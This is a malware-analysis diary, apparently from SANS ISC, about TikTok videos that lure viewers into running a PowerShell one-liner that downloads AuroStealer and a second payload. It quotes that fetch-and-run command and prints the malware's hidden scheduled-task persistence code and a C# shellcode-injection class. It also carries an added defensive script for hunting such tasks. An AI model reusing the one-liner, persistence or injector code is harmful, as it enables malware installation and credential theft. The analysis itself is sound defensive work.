TikTok Videos Promoting Malware Installation, (Fri, Oct 17th)
Attackers use TikTok videos to trick users into "activating Photoshop for free", which in fact runs a malicious PowerShell script that downloads malware. The script downloads AuroStealer and another payload, and uses a self-compilation technique to inject shellcode. The attackers have also posted several similar videos. 2025-10-17 07:40:08 Author: isc.sans.edu (view original)

Attackers are everywhere! They try to abuse victims using new communication channels and social engineering techniques! Somebody pointed me to the following TikTok video: hxxps://vm[.]tiktok[.]com/ZGdaCkbEF/.

The author claims to offer an easy way to activate Photoshop for free:

Note that the video has already been liked more than 500 times!

The technique is similar to the ClickFix[1] attack scenario. The victim is asked to start a PowerShell as administrator and execute a one-liner:

iex (irm slmgr[.]win/photoshop)

When visiting this link, you'll get a piece of malicious PowerShell code that will be executed (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23). It has a VT score of 17/63[2]. Let's have a look at it!

It downloads the next stage from https://file-epq[.]pages[.]dev/updater.exe. Persistence is implemented through a scheduled task to execute it at logon time:

$tasknames = @('MicrosoftEdgeUpdateTaskMachineCore','GoogleUpdateTaskMachineCore','AdobeUpdateTask','OfficeBackgroundTaskHandlerRegistration','WindowsUpdateCheck')
$taskname = $tasknames[(Get-Random -Max 5)]
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -ExecutionPolicy Bypass -Command `"$scr`""
$trigger = New-ScheduledTaskTrigger -AtLogOn
$principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive -RunLevel Highest
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -DontStopOnIdleEnd
Register-ScheduledTask -TaskName $taskname -Action $action -Trigger $trigger -Principal $principal -Settings $settings -Force -ErrorAction SilentlyContinue | Out-Null
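A hunting script for the persistence shown above, added here as an example and not taken from the diary or the malware. It assumes it runs on the host being checked with rights to enumerate all scheduled tasks; since two of the decoy names are also used by legitimate Edge and Google update tasks, it only reports tasks whose action is a hidden PowerShell with the execution policy bypassed, and uses the decoy name and the logon trigger to rank the hit.

```powershell
# Added hunting example (not the diary's code): find scheduled tasks that look like
# the persistence above. Assumes local rights to enumerate all tasks.
$decoyNames = @('MicrosoftEdgeUpdateTaskMachineCore', 'GoogleUpdateTaskMachineCore',
                'AdobeUpdateTask', 'OfficeBackgroundTaskHandlerRegistration', 'WindowsUpdateCheck')

function Test-HiddenBypassPowerShell {
    # True when an exec action launches powershell/pwsh hidden with -ExecutionPolicy Bypass.
    # Genuine vendor update tasks run their own updater binary, never powershell.exe.
    param($Action)
    $exe = [string]$Action.Execute
    $argString = [string]$Action.Arguments
    if ($exe -notmatch '(?i)(powershell|pwsh)(\.exe)?"?$') { return $false }
    return ($argString -match '(?i)-WindowStyle\s+Hidden' -and
            $argString -match '(?i)-ExecutionPolicy\s+Bypass')
}

$findings = foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
    # Only MSFT_TaskExecAction actions carry Execute; COM-handler actions are skipped.
    $psHit = @($task.Actions | Where-Object { $_.Execute -and (Test-HiddenBypassPowerShell $_) }).Count -gt 0
    if (-not $psHit) { continue }   # a decoy name alone is noise, see lead-in
    $nameMatch = $decoyNames -contains $task.TaskName
    $atLogon = @($task.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' }).Count -gt 0
    $severity = if ($nameMatch) { 'High' } elseif ($atLogon) { 'Medium' } else { 'Low' }
    [PSCustomObject]@{
        Severity  = $severity
        TaskName  = $task.TaskName
        TaskPath  = $task.TaskPath
        DecoyName = $nameMatch
        AtLogon   = $atLogon
        RunLevel  = $task.Principal.RunLevel
        Command   = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join ' ; '
    }
}
$findings | Format-Table -AutoSize
```

Review any High or Medium hit by reading the full command line: the sample stores the downloader script in a variable and passes it inline, so the argument string itself carries the payload URL.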

Updater.exe (SHA256: 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8) is an AuroStealer[3].

Finally, a second payload is downloaded and executed: source.exe (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011)[4]. This one implements an interesting technique: it compiles some code on demand during its execution:

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\vpkwkdbo.cmdline"

This is something that I covered in previous diaries ("self-compiling malware")[5]. The compiled code is a class used to inject a shellcode in memory:

using System;
using System.Runtime.InteropServices;
public class SC {
    [DllImport("kernel32.dll")]
    public static extern IntPtr VirtualAlloc(IntPtr a, uint s, uint t, uint p);
    [DllImport("kernel32.dll")]
    public static extern IntPtr CreateThread(IntPtr a, uint s, IntPtr addr, IntPtr p, uint f, IntPtr t);
    [DllImport("kernel32.dll")]
    public static extern uint WaitForSingleObject(IntPtr h, uint m);
    public static void Run(byte[] sc) {
      // 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE: an RWX region sized to the shellcode
      IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)sc.Length, 0x3000, 0x40);
      // copy the shellcode bytes into the executable region
      Marshal.Copy(sc, 0, addr, sc.Length);
      // run it on a new thread whose start address is the buffer itself
      IntPtr t = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
      // 0xFFFFFFFF = INFINITE: block until the shellcode thread ends
      WaitForSingleObject(t, 0xFFFFFFFF);
    }
}

While investigating this piece of malware, I discovered more videos from the same campaign but using other software names:

  • hxxps://vm[.]tiktok[.]com/ZGdaC7EQY/
  • hxxps://vm[.]tiktok[.]com/ZGdaX8jVq/

Stay safe and don't trust such videos!

[1] https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
[2] https://www.virustotal.com/gui/file/6d897b5661aa438a96ac8695c54b7c4f3a1fbf1b628c8d2011e50864860c6b23
[3] https://malpedia.caad.fkie.fraunhofer.de/details/win.aurastealer
[4] https://www.virustotal.com/gui/file/db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011
[5] https://isc.sans.edu/diary/Malware+Samples+Compiling+Their+Next+Stage+on+Premise/25278

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key


Source: https://isc.sans.edu/diary/rss/32380